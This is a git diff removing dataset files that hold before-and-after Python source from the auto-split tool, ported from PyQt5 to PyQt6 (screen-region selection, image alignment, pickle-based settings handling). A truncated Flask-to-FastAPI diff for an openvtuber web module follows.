self.height = -1 - self.width = -1 - - self.begin = QtCore.QPoint() - self.end = QtCore.QPoint() - self.setWindowOpacity(0.5) - QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CrossCursor)) - self.setWindowFlags(QtCore.Qt.FramelessWindowHint) - self.show() - - def paintEvent(self, event): - qp = QtGui.QPainter(self) - qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2)) - qp.setBrush(QtGui.QColor('opaque')) - qp.drawRect(QtCore.QRect(self.begin, self.end)) - - def mousePressEvent(self, event): - self.begin = event.pos() - self.end = self.begin - self.update() - - def mouseMoveEvent(self, event): - self.end = event.pos() - self.update() - - def mouseReleaseEvent(self, event): - QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor)) - self.close() - - # The coordinates are pulled relative to the top left of the set geometry, - # so the added virtual screen offsets convert them back to the virtual - # screen coordinates - self.left = min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN - self.top = min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN - self.right = max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN - self.bottom = max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN - - self.height = self.bottom - self.top - self.width = self.right - self.left diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py deleted file mode 100644 index a4606fc..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.target.py +++ /dev/null @@ -1,292 +0,0 @@ -from PyQt6 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -from typing import cast, Callable -import capture_windows -import ctypes -import ctypes.wintypes -import cv2 -import numpy as np - -def selectRegion(self): - # Create a screen selector widget - selector = SelectRegionWidget() - - # Need to wait until the user has selected a region using the widget before moving on with - # selecting the window settings - while selector.height == -1 and selector.width == -1: - QtTest.QTest.qWait(1) - - # return an error if width or height are zero. - if selector.width == 0 or selector.height == 0: - self.regionSizeError() - return - - # Width and Height of the spinBox - self.widthSpinBox.setValue(selector.width) - self.heightSpinBox.setValue(selector.height) - - # Grab the window handle from the coordinates selected by the widget - self.hwnd = cast(int, win32gui.WindowFromPoint((selector.left, selector.top))) - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. - GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor) - GA_ROOT = 2 - - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): - self.hwnd = GetAncestor(self.hwnd, GA_ROOT) - - if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '': - self.hwnd_title = win32gui.GetWindowText(self.hwnd) - - # Convert the Desktop Coordinates to Window Coordinates - DwmGetWindowAttribute = ctypes.windll.dwmapi.DwmGetWindowAttribute - DWMWA_EXTENDED_FRAME_BOUNDS = 9 - - # Pull the window's coordinates relative to desktop into rect - DwmGetWindowAttribute(self.hwnd, - ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS), - ctypes.byref(self.rect), - ctypes.sizeof(self.rect) - ) - - # On Windows 10 the windows have offsets due to invisible pixels not accounted for in DwmGetWindowAttribute - # TODO: Since this occurs on Windows 10, is DwmGetWindowAttribute even required over GetWindowRect alone? - # Research needs to be done to figure out why it was used it over win32gui in the first place... - # I have a feeling it was due to a misunderstanding and not getting the correct parent window before. - offset_left = self.rect.left - win32gui.GetWindowRect(self.hwnd)[0] - offset_top = self.rect.top - win32gui.GetWindowRect(self.hwnd)[1] - - self.rect.left = selector.left - (self.rect.left - offset_left) - self.rect.top = selector.top - (self.rect.top - offset_top) - self.rect.right = self.rect.left + selector.width - self.rect.bottom = self.rect.top + selector.height - - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - - # Delete that widget since it is no longer used from here on out - del selector - - # check if live image needs to be turned on or just set a single image - self.checkLiveImage() - -def selectWindow(self): - # Create a screen selector widget - selector = SelectWindowWidget() - - # Need to wait until the user has selected a region using the widget before moving on with - # selecting the window settings - while selector.x == -1 and selector.y == -1: - QtTest.QTest.qWait(1) - - # Grab the window handle from the coordinates selected by the widget - self.hwnd = cast(int, win32gui.WindowFromPoint((selector.x, selector.y))) - - if self.hwnd == 0: - return - - del selector - - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. - GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor) - GA_ROOT = 2 - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): - self.hwnd = GetAncestor(self.hwnd, GA_ROOT) - - if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '': - self.hwnd_title = win32gui.GetWindowText(self.hwnd) - - # getting window bounds - # on windows there are some invisble pixels that are not accounted for - # also the top bar with the window name is not accounted for - # I hardcoded the x and y coordinates to fix this - # This is not an ideal solution because it assumes every window will have a top bar - rect = win32gui.GetClientRect(self.hwnd) - self.rect.left = 8 - self.rect.top = 31 - self.rect.right = 0 + rect[2] - self.rect.bottom = 0 + rect[3] - - self.widthSpinBox.setValue(self.rect.right) - self.heightSpinBox.setValue(self.rect.bottom) - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - - self.checkLiveImage() - -def alignRegion(self): - # check to see if a region has been set - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - # This is the image used for aligning the capture region - # to the best fit for the user. - template_filename = str(QtWidgets.QFileDialog.getOpenFileName( - self, - "Select Reference Image", - "", - "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)")) - - # return if the user presses cancel - if template_filename == '': - return - - template = cv2.imread(template_filename, cv2.IMREAD_COLOR) - - # shouldn't need this, but just for caution, throw a type error if file is not a valid image file - if template is None: - self.alignRegionImageTypeError() - return - - # Obtaining the capture of a region which contains the - # subregion being searched for to align the image. - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # Obtain the best matching point for the template within the - # capture. This assumes that the template is actually smaller - # than the dimensions of the capture. Since we are using SQDIFF - # the best match will be the min_val which is located at min_loc. - # The best match found in the image, set everything to 0 by default - # so that way the first match will overwrite these values - best_match = 0.0 - best_height = 0 - best_width = 0 - best_loc = (0, 0) - - # This tests 50 images scaled from 20% to 300% of the original template size - for scale in np.linspace(0.2, 3, num=56): - width = int(template.shape[1] * scale) - height = int(template.shape[0] * scale) - - # The template can not be larger than the capture - if width > capture.shape[1] or height > capture.shape[0]: - continue - - resized = cv2.resize(template, (width, height)) - - result = cv2.matchTemplate(capture, resized, cv2.TM_SQDIFF) - min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result) - - # The maximum value for SQ_DIFF is dependent on the size of the template - # we need this value to normalize it from 0.0 to 1.0 - max_error = resized.size * 255 * 255 - similarity = 1 - (min_val / max_error) - - # Check if the similarity was good enough to get alignment - if similarity > best_match: - best_match = similarity - best_width = width - best_height = height - best_loc = min_loc - - # Go ahead and check if this satisfies our requirement before setting the region - # We don't want a low similarity image to be aligned. - if best_match < 0.9: - self.alignmentNotMatchedError() - return - - # The new region can be defined by using the min_loc point and the - # height and width of the template. - self.rect.left = self.rect.left + best_loc[0] - self.rect.top = self.rect.top + best_loc[1] - self.rect.right = self.rect.left + best_width - self.rect.bottom = self.rect.top + best_height - - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - self.widthSpinBox.setValue(best_width) - self.heightSpinBox.setValue(best_height) - - -# widget to select a window and obtain its bounds -class SelectWindowWidget(QtWidgets.QWidget): - def __init__(self): - super(SelectWindowWidget, self).__init__() - user32 = ctypes.windll.user32 - user32.SetProcessDPIAware() - - self.x = -1 - self.y = -1 - - # We need to pull the monitor information to correctly draw the geometry covering all portions - # of the user's screen. These parameters create the bounding box with left, top, width, and height - self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76) - self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77) - self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78) - self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79) - - self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN, - self.SM_CYVIRTUALSCREEN) - self.setWindowTitle(' ') - - self.setWindowOpacity(0.5) - self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint) - self.show() - - def mouseReleaseEvent(self, event: QtGui.QMouseEvent): - self.close() - self.x = int(event.position().x()) - self.y = int(event.position().y()) - -# Widget for dragging screen region -# https://github.com/harupy/snipping-tool -class SelectRegionWidget(QtWidgets.QWidget): - def __init__(self): - super(SelectRegionWidget, self).__init__() - user32 = ctypes.windll.user32 - user32.SetProcessDPIAware() - - # We need to pull the monitor information to correctly draw the geometry covering all portions - # of the user's screen. These parameters create the bounding box with left, top, width, and height - self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76) - self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77) - self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78) - self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79) - - self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN, - self.SM_CYVIRTUALSCREEN) - self.setWindowTitle(' ') - - self.height = -1 - self.width = -1 - - self.begin = QtCore.QPoint() - self.end = QtCore.QPoint() - self.setWindowOpacity(0.5) - QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.CrossCursor)) - self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint) - self.show() - - def paintEvent(self, event: QtGui.QPaintEvent): - qp = QtGui.QPainter(self) - qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2)) - qp.setBrush(QtGui.QColor('opaque')) - qp.drawRect(QtCore.QRect(self.begin, self.end)) - - def mousePressEvent(self, event: QtGui.QMouseEvent): - self.begin = event.position().toPoint() - self.end = self.begin - self.update() - - def mouseMoveEvent(self, event: QtGui.QMouseEvent): - self.end = event.position().toPoint() - self.update() - - def mouseReleaseEvent(self, event: QtGui.QMouseEvent): - QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor)) - self.close() - - # The coordinates are pulled relative to the top left of the set geometry, - # so the added virtual screen offsets convert them back to the virtual - # screen coordinates - self.left = int(min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN) - self.top = int(min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN) - self.right = int(max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN) - self.bottom = int(max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN) - - self.height = self.bottom - self.top - self.width = self.right - self.left diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff deleted file mode 100644 index 773c113..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/src/settings_file.py b/src/settings_file.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/settings_file.py - +++ b/src/settings_file.py -@@ -1,5 +1,5 @@ - from win32 import win32gui --from PyQt5 import QtWidgets -+from PyQt6 import QtWidgets - import keyboard - import pickle - import glob diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py deleted file mode 100644 index 4f43249..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.source.py +++ /dev/null @@ -1,267 +0,0 @@ -from win32 import win32gui -from PyQt5 import QtWidgets -import keyboard -import pickle -import glob - - -def getSaveSettingsValues(self): - # get values to be able to save settings - self.x = self.xSpinBox.value() - self.y = self.ySpinBox.value() - self.width = self.widthSpinBox.value() - self.height = self.heightSpinBox.value() - self.split_image_directory = str(self.splitimagefolderLineEdit.text()) - self.similarity_threshold = self.similaritythresholdDoubleSpinBox.value() - self.comparison_index = self.comparisonmethodComboBox.currentIndex() - self.pause = self.pauseDoubleSpinBox.value() - self.fps_limit = self.fpslimitSpinBox.value() - self.split_key = str(self.splitLineEdit.text()) - self.reset_key = str(self.resetLineEdit.text()) - self.skip_split_key = str(self.skipsplitLineEdit.text()) - self.undo_split_key = str(self.undosplitLineEdit.text()) - self.pause_key = str(self.pausehotkeyLineEdit.text()) - - if self.custompausetimesCheckBox.isChecked(): - self.custom_pause_times_setting = 1 - else: - self.custom_pause_times_setting = 0 - - if self.customthresholdsCheckBox.isChecked(): - self.custom_thresholds_setting = 1 - else: - self.custom_thresholds_setting = 0 - - if self.groupDummySplitsCheckBox.isChecked(): - self.group_dummy_splits_undo_skip_setting = 1 - else: - self.group_dummy_splits_undo_skip_setting = 0 - - if self.loopCheckBox.isChecked(): - self.loop_setting = 1 - else: - self.loop_setting = 0 - - if self.autostartonresetCheckBox.isChecked(): - self.auto_start_on_reset_setting = 1 - else: - self.auto_start_on_reset_setting = 0 - -def haveSettingsChanged(self): - self.getSaveSettingsValues() - self.current_save_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - #one small caveat in this: if you load a settings file from an old version, but dont change settings, - #the current save settings and last load settings will have different # of elements and it will ask - #the user to save changes upon closing even though there were none - if self.current_save_settings == self.last_loaded_settings or self.current_save_settings == self.last_saved_settings: - return False - else: - return True - -def saveSettings(self): - if self.last_successfully_loaded_settings_file_path == None: - self.saveSettingsAs() - else: - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, - self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, - self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - # save settings to a .pkl file - with open(self.last_successfully_loaded_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - -def saveSettingsAs(self): - # user picks save destination - self.save_settings_file_path = str(QtWidgets.QFileDialog.getSaveFileName(self, "Save Settings As", "", "PKL (*.pkl)")) - - #if user cancels save destination window, don't save settings - if self.save_settings_file_path == '': - return - - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - # save settings to a .pkl file - with open(self.save_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - - #wording is kinda off here but this needs to be here for an edge case: for when a file has never loaded, but you - #save file as successfully. - self.last_successfully_loaded_settings_file_path = self.save_settings_file_path - - -def loadSettings(self): - if self.load_settings_on_open == True: - self.settings_files = glob.glob("*.pkl") - if len(self.settings_files) < 1: - self.noSettingsFileOnOpenError() - self.last_loaded_settings = None - return - elif len(self.settings_files) > 1: - self.tooManySettingsFilesOnOpenError() - self.last_loaded_settings = None - return - else: - self.load_settings_file_path = self.settings_files[0] - - else: - self.load_settings_file_path = str(QtWidgets.QFileDialog.getOpenFileName(self, "Load Settings", "", "PKL (*.pkl)")) - - # - if self.load_settings_file_path == '': - return - - try: - with open(self.load_settings_file_path, 'rb') as f: - self.settings_count = len(pickle.load(f)) - #v1.5 settings - if self.settings_count == 20: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] = pickle.load(f) - #v1.3-1.4 settings. add a blank pause key. - elif self.settings_count == 18: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting] = pickle.load(f) - self.pause_key = '' - self.auto_start_on_reset_setting = 0 - elif self.settings_count < 18: - self.oldVersionSettingsFileError() - return - - self.split_image_directory = str(self.split_image_directory) - self.splitimagefolderLineEdit.setText(self.split_image_directory) - self.similaritythresholdDoubleSpinBox.setValue(self.similarity_threshold) - self.pauseDoubleSpinBox.setValue(self.pause) - self.fpslimitSpinBox.setValue(self.fps_limit) - self.xSpinBox.setValue(self.x) - self.ySpinBox.setValue(self.y) - self.widthSpinBox.setValue(self.width) - self.heightSpinBox.setValue(self.height) - self.comparisonmethodComboBox.setCurrentIndex(self.comparison_index) - self.hwnd = win32gui.FindWindow(None, self.hwnd_title) - - # set custom checkbox's accordingly - if self.custom_pause_times_setting == 1: - self.custompausetimesCheckBox.setChecked(True) - else: - self.custompausetimesCheckBox.setChecked(False) - - if self.custom_thresholds_setting == 1: - self.customthresholdsCheckBox.setChecked(True) - else: - self.customthresholdsCheckBox.setChecked(False) - - if self.group_dummy_splits_undo_skip_setting == 1: - self.groupDummySplitsCheckBox.setChecked(True) - else: - self.groupDummySplitsCheckBox.setChecked(False) - - if self.loop_setting == 1: - self.loopCheckBox.setChecked(True) - else: - self.loopCheckBox.setChecked(False) - - if self.auto_start_on_reset_setting == 1: - self.autostartonresetCheckBox.setChecked(True) - else: - self.autostartonresetCheckBox.setChecked(False) - - # try to set hotkeys from when user last closed the window - try: - try: - keyboard.remove_hotkey(self.split_hotkey) - except AttributeError: - pass - self.splitLineEdit.setText(str(self.split_key)) - self.split_hotkey = keyboard.add_hotkey(str(self.split_key), self.startAutoSplitter) - self.old_split_key = self.split_key - # pass if the key is an empty string (hotkey was never set) - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.reset_hotkey) - except AttributeError: - pass - self.resetLineEdit.setText(str(self.reset_key)) - self.reset_hotkey = keyboard.add_hotkey(str(self.reset_key), self.startReset) - self.old_reset_key = self.reset_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.skip_split_hotkey) - except AttributeError: - pass - self.skipsplitLineEdit.setText(str(self.skip_split_key)) - self.skip_split_hotkey = keyboard.add_hotkey(str(self.skip_split_key), self.startSkipSplit) - self.old_skip_split_key = self.skip_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.undo_split_hotkey) - except AttributeError: - pass - self.undosplitLineEdit.setText(str(self.undo_split_key)) - self.undo_split_hotkey = keyboard.add_hotkey(str(self.undo_split_key), self.startUndoSplit) - self.old_undo_split_key = self.undo_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.pause_hotkey) - except AttributeError: - pass - self.pausehotkeyLineEdit.setText(str(self.pause_key)) - self.pause_hotkey = keyboard.add_hotkey(str(self.pause_key), self.startPause) - self.old_pause_key = self.pause_key - except ValueError: - pass - except KeyError: - pass - - self.last_successfully_loaded_settings_file_path = self.load_settings_file_path - self.checkLiveImage() - - except Exception: - self.invalidSettingsError() - pass diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py deleted file mode 100644 index 5329aaa..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$settings_file.py.target.py +++ /dev/null @@ -1,267 +0,0 @@ -from win32 import win32gui -from PyQt6 import QtWidgets -import keyboard -import pickle -import glob - - -def getSaveSettingsValues(self): - # get values to be able to save settings - self.x = self.xSpinBox.value() - self.y = self.ySpinBox.value() - self.width = self.widthSpinBox.value() - self.height = self.heightSpinBox.value() - self.split_image_directory = str(self.splitimagefolderLineEdit.text()) - self.similarity_threshold = self.similaritythresholdDoubleSpinBox.value() - self.comparison_index = self.comparisonmethodComboBox.currentIndex() - self.pause = self.pauseDoubleSpinBox.value() - self.fps_limit = self.fpslimitSpinBox.value() - self.split_key = str(self.splitLineEdit.text()) - self.reset_key = str(self.resetLineEdit.text()) - self.skip_split_key = str(self.skipsplitLineEdit.text()) - self.undo_split_key = str(self.undosplitLineEdit.text()) - self.pause_key = str(self.pausehotkeyLineEdit.text()) - - if self.custompausetimesCheckBox.isChecked(): - self.custom_pause_times_setting = 1 - else: - self.custom_pause_times_setting = 0 - - if self.customthresholdsCheckBox.isChecked(): - self.custom_thresholds_setting = 1 - else: - self.custom_thresholds_setting = 0 - - if self.groupDummySplitsCheckBox.isChecked(): - self.group_dummy_splits_undo_skip_setting = 1 - else: - self.group_dummy_splits_undo_skip_setting = 0 - - if self.loopCheckBox.isChecked(): - self.loop_setting = 1 - else: - self.loop_setting = 0 - - if self.autostartonresetCheckBox.isChecked(): - self.auto_start_on_reset_setting = 1 - else: - self.auto_start_on_reset_setting = 0 - -def haveSettingsChanged(self): - self.getSaveSettingsValues() - self.current_save_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - #one small caveat in this: if you load a settings file from an old version, but dont change settings, - #the current save settings and last load settings will have different # of elements and it will ask - #the user to save changes upon closing even though there were none - if self.current_save_settings == self.last_loaded_settings or self.current_save_settings == self.last_saved_settings: - return False - else: - return True - -def saveSettings(self): - if self.last_successfully_loaded_settings_file_path == None: - self.saveSettingsAs() - else: - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, - self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, - self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - # save settings to a .pkl file - with open(self.last_successfully_loaded_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - -def saveSettingsAs(self): - # user picks save destination - self.save_settings_file_path = str(QtWidgets.QFileDialog.getSaveFileName(self, "Save Settings As", "", "PKL (*.pkl)")) - - #if user cancels save destination window, don't save settings - if self.save_settings_file_path == '': - return - - self.getSaveSettingsValues() - self.last_saved_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] - - # save settings to a .pkl file - with open(self.save_settings_file_path, 'wb') as f: - pickle.dump(self.last_saved_settings, f) - - #wording is kinda off here but this needs to be here for an edge case: for when a file has never loaded, but you - #save file as successfully. - self.last_successfully_loaded_settings_file_path = self.save_settings_file_path - - -def loadSettings(self): - if self.load_settings_on_open == True: - self.settings_files = glob.glob("*.pkl") - if len(self.settings_files) < 1: - self.noSettingsFileOnOpenError() - self.last_loaded_settings = None - return - elif len(self.settings_files) > 1: - self.tooManySettingsFilesOnOpenError() - self.last_loaded_settings = None - return - else: - self.load_settings_file_path = self.settings_files[0] - - else: - self.load_settings_file_path = str(QtWidgets.QFileDialog.getOpenFileName(self, "Load Settings", "", "PKL (*.pkl)")) - - # - if self.load_settings_file_path == '': - return - - try: - with open(self.load_settings_file_path, 'rb') as f: - self.settings_count = len(pickle.load(f)) - #v1.5 settings - if self.settings_count == 20: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.pause_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting, self.auto_start_on_reset_setting] = pickle.load(f) - #v1.3-1.4 settings. add a blank pause key. - elif self.settings_count == 18: - with open(self.load_settings_file_path, 'rb') as f: - self.last_loaded_settings = [self.split_image_directory, self.similarity_threshold, self.comparison_index, self.pause, - self.fps_limit, self.split_key, - self.reset_key, self.skip_split_key, self.undo_split_key, self.x, self.y, self.width, self.height, - self.hwnd_title, - self.custom_pause_times_setting, self.custom_thresholds_setting, - self.group_dummy_splits_undo_skip_setting, self.loop_setting] = pickle.load(f) - self.pause_key = '' - self.auto_start_on_reset_setting = 0 - elif self.settings_count < 18: - self.oldVersionSettingsFileError() - return - - self.split_image_directory = str(self.split_image_directory) - self.splitimagefolderLineEdit.setText(self.split_image_directory) - self.similaritythresholdDoubleSpinBox.setValue(self.similarity_threshold) - self.pauseDoubleSpinBox.setValue(self.pause) - self.fpslimitSpinBox.setValue(self.fps_limit) - self.xSpinBox.setValue(self.x) - self.ySpinBox.setValue(self.y) - self.widthSpinBox.setValue(self.width) - self.heightSpinBox.setValue(self.height) - self.comparisonmethodComboBox.setCurrentIndex(self.comparison_index) - self.hwnd = win32gui.FindWindow(None, self.hwnd_title) - - # set custom checkbox's accordingly - if self.custom_pause_times_setting == 1: - self.custompausetimesCheckBox.setChecked(True) - else: - self.custompausetimesCheckBox.setChecked(False) - - if self.custom_thresholds_setting == 1: - self.customthresholdsCheckBox.setChecked(True) - else: - self.customthresholdsCheckBox.setChecked(False) - - if self.group_dummy_splits_undo_skip_setting == 1: - self.groupDummySplitsCheckBox.setChecked(True) - else: - self.groupDummySplitsCheckBox.setChecked(False) - - if self.loop_setting == 1: - self.loopCheckBox.setChecked(True) - else: - self.loopCheckBox.setChecked(False) - - if self.auto_start_on_reset_setting == 1: - self.autostartonresetCheckBox.setChecked(True) - else: - self.autostartonresetCheckBox.setChecked(False) - - # try to set hotkeys from when user last closed the window - try: - try: - keyboard.remove_hotkey(self.split_hotkey) - except AttributeError: - pass - self.splitLineEdit.setText(str(self.split_key)) - self.split_hotkey = keyboard.add_hotkey(str(self.split_key), self.startAutoSplitter) - self.old_split_key = self.split_key - # pass if the key is an empty string (hotkey was never set) - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.reset_hotkey) - except AttributeError: - pass - self.resetLineEdit.setText(str(self.reset_key)) - self.reset_hotkey = keyboard.add_hotkey(str(self.reset_key), self.startReset) - self.old_reset_key = self.reset_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.skip_split_hotkey) - except AttributeError: - pass - self.skipsplitLineEdit.setText(str(self.skip_split_key)) - self.skip_split_hotkey = keyboard.add_hotkey(str(self.skip_split_key), self.startSkipSplit) - self.old_skip_split_key = self.skip_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.undo_split_hotkey) - except AttributeError: - pass - self.undosplitLineEdit.setText(str(self.undo_split_key)) - self.undo_split_hotkey = keyboard.add_hotkey(str(self.undo_split_key), self.startUndoSplit) - self.old_undo_split_key = self.undo_split_key - except ValueError: - pass - except KeyError: - pass - - try: - try: - keyboard.remove_hotkey(self.pause_hotkey) - except AttributeError: - pass - self.pausehotkeyLineEdit.setText(str(self.pause_key)) - self.pause_hotkey = keyboard.add_hotkey(str(self.pause_key), self.startPause) - self.old_pause_key = self.pause_key - except ValueError: - pass - except KeyError: - pass - - self.last_successfully_loaded_settings_file_path = self.load_settings_file_path - self.checkLiveImage() - - except Exception: - self.invalidSettingsError() - pass diff --git a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff b/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff deleted file mode 100644 index 6b53180..0000000 --- a/v1/data/codefile/virtuber@openvtuber__3abbc43__openvtuber-server$src$openvtuber$web$web.py.diff +++ /dev/null @@ -1,30 +0,0 @@ -diff --git a/openvtuber-server/src/openvtuber/web/web.py b/openvtuber-server/src/openvtuber/web/web.py - index 6386032f18ac5d45f776c68436e0d70f0e877171..3abbc431e586218470f47eac10fa6d351c6fe907 100644 - --- a/openvtuber-server/src/openvtuber/web/web.py - +++ b/openvtuber-server/src/openvtuber/web/web.py -@@ -1,17 +1,16 @@ - from .config import Configuration as config - --from flask import Flask, send_from_directory -+import uvicorn -+from fastapi import FastAPI -+from fastapi.staticfiles import StaticFiles - from openvtuber import utils - --app = Flask(__name__, static_url_path='') -+app = FastAPI() - -- --@app.route('/openvtuber/') --def serve_pwa(path): -- root = utils.get_project_root() -- abspath = 